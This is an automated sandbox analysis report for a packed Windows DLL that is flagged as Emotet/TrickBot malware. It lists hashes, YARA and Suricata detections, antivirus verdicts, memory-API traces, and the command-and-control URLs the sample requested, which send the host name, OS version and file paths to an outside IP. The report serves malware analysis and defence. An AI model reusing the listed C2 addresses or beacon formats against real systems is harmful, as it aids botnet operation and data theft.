Summary | ZeroBOX

dHAfdxR.img

Emotet UPX Malicious Library PE File DLL OS Processor Check PE32
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 6, 2021, 8:04 a.m. Aug. 6, 2021, 8:06 a.m.
Size 656.0KB
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 7c44e0a43e508476eda5f699d39a0c7f
SHA256 bf81ad343dce8b514941ffd47576b78e02b41c23aec991fd5a48ad00c67ad942
CRC32 3DA5DA7D
ssdeep 12288:5bjfhtlWxycV80o3xKA3cHfnoEQOuG/ENYIm8MxxO9qrcOJz8:5bj9ZcG0CxKA3cHPoEQRjNXNYxtnF
Yara
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check
  • IsDLL - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Win32_Trojan_Emotet_1_Zero - Win32 Trojan Emotet
  • IsPE32 - (no description)

IP Address Status Action
164.124.101.2 Active Moloch
46.99.175.217 Active Moloch
95.217.228.176 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49203 -> 46.99.175.217:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 46.99.175.217:443 -> 192.168.56.101:49203 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.101:49204 -> 95.217.228.176:80 2019737 ET POLICY IP Check wtfismyip.com Potential Corporate Privacy Violation
TCP 192.168.56.101:49204 -> 95.217.228.176:80 2013028 ET POLICY curl User-Agent Outbound Attempted Information Leak

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49203
46.99.175.217:443
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd C=AU, ST=Some-State, O=Internet Widgits Pty Ltd b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
packer Armadillo v1.xx - v2.xx
suspicious_features Connection to IP address suspicious_request GET https://46.99.175.217/rob120/TEST22-PC_W617601.7FE1BBFB3D97947F3041B3C9EB33D5D9/5/file/
suspicious_features Connection to IP address suspicious_request GET https://46.99.175.217/rob120/TEST22-PC_W617601.7FE1BBFB3D97947F3041B3C9EB33D5D9/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/fhTbf7JhRDRVtj5VTdXtfPPzNxH/
suspicious_features Connection to IP address suspicious_request GET https://46.99.175.217/rob120/TEST22-PC_W617601.7FE1BBFB3D97947F3041B3C9EB33D5D9/14/user/test22/0/
suspicious_features Connection to IP address suspicious_request GET https://46.99.175.217/rob120/TEST22-PC_W617601.7FE1BBFB3D97947F3041B3C9EB33D5D9/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5Cwise-tools5HD5PH%5CnxdHAfdxRxl.grf/0/
suspicious_features Connection to IP address suspicious_request GET https://46.99.175.217/rob120/TEST22-PC_W617601.7FE1BBFB3D97947F3041B3C9EB33D5D9/23/100019/
suspicious_features Connection to IP address suspicious_request GET https://46.99.175.217/rob120/TEST22-PC_W617601.7FE1BBFB3D97947F3041B3C9EB33D5D9/14/DNSBL/listed/0/
request GET http://wtfismyip.com/text
request GET https://46.99.175.217/rob120/TEST22-PC_W617601.7FE1BBFB3D97947F3041B3C9EB33D5D9/5/file/
request GET https://46.99.175.217/rob120/TEST22-PC_W617601.7FE1BBFB3D97947F3041B3C9EB33D5D9/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/fhTbf7JhRDRVtj5VTdXtfPPzNxH/
request GET https://46.99.175.217/rob120/TEST22-PC_W617601.7FE1BBFB3D97947F3041B3C9EB33D5D9/14/user/test22/0/
request GET https://46.99.175.217/rob120/TEST22-PC_W617601.7FE1BBFB3D97947F3041B3C9EB33D5D9/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5Cwise-tools5HD5PH%5CnxdHAfdxRxl.grf/0/
request GET https://46.99.175.217/rob120/TEST22-PC_W617601.7FE1BBFB3D97947F3041B3C9EB33D5D9/23/100019/
request GET https://46.99.175.217/rob120/TEST22-PC_W617601.7FE1BBFB3D97947F3041B3C9EB33D5D9/14/DNSBL/listed/0/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x1004b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x756a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d21000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cb0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73701000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72b94000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73702000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73c81000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1908
region_size: 233472
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02040000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73c61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x737c1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1908
region_size: 278528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02280000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1908
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009e0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1908
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10000000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
3221225496 0

NtAllocateVirtualMemory

process_identifier: 1908
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a30000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1908
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a31000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1908
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a40000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1908
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1908
region_size: 163840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1332
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000002a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
description wermgr.exe tried to sleep 203 seconds, actually delayed analysis time by 203 seconds
domain wtfismyip.com
cmdline C:\Windows\system32\cmd.exe
FireEye Generic.mg.7c44e0a43e508476
McAfee Artemis!7C44E0A43E50
CrowdStrike win/malicious_confidence_60% (D)
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
McAfee-GW-Edition BehavesLike.Win32.BadFile.jc
Microsoft Trojan:Win32/TrickBotCrypt.DX!MTB
Cynet Malicious (score: 100)
Rising Trojan.Kryptik!1.D78B (CLASSIC)
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 8192
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x02201000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
section {u'size_of_data': u'0x00042000', u'virtual_address': u'0x0005f000', u'entropy': 7.775395827982044, u'name': u'.rsrc', u'virtual_size': u'0x00041310'} entropy 7.77539582798 description A section with a high entropy has been found
entropy 0.40490797546 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2800
process_handle: 0x00000118
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2800
process_handle: 0x00000118
1 0 0
host 46.99.175.217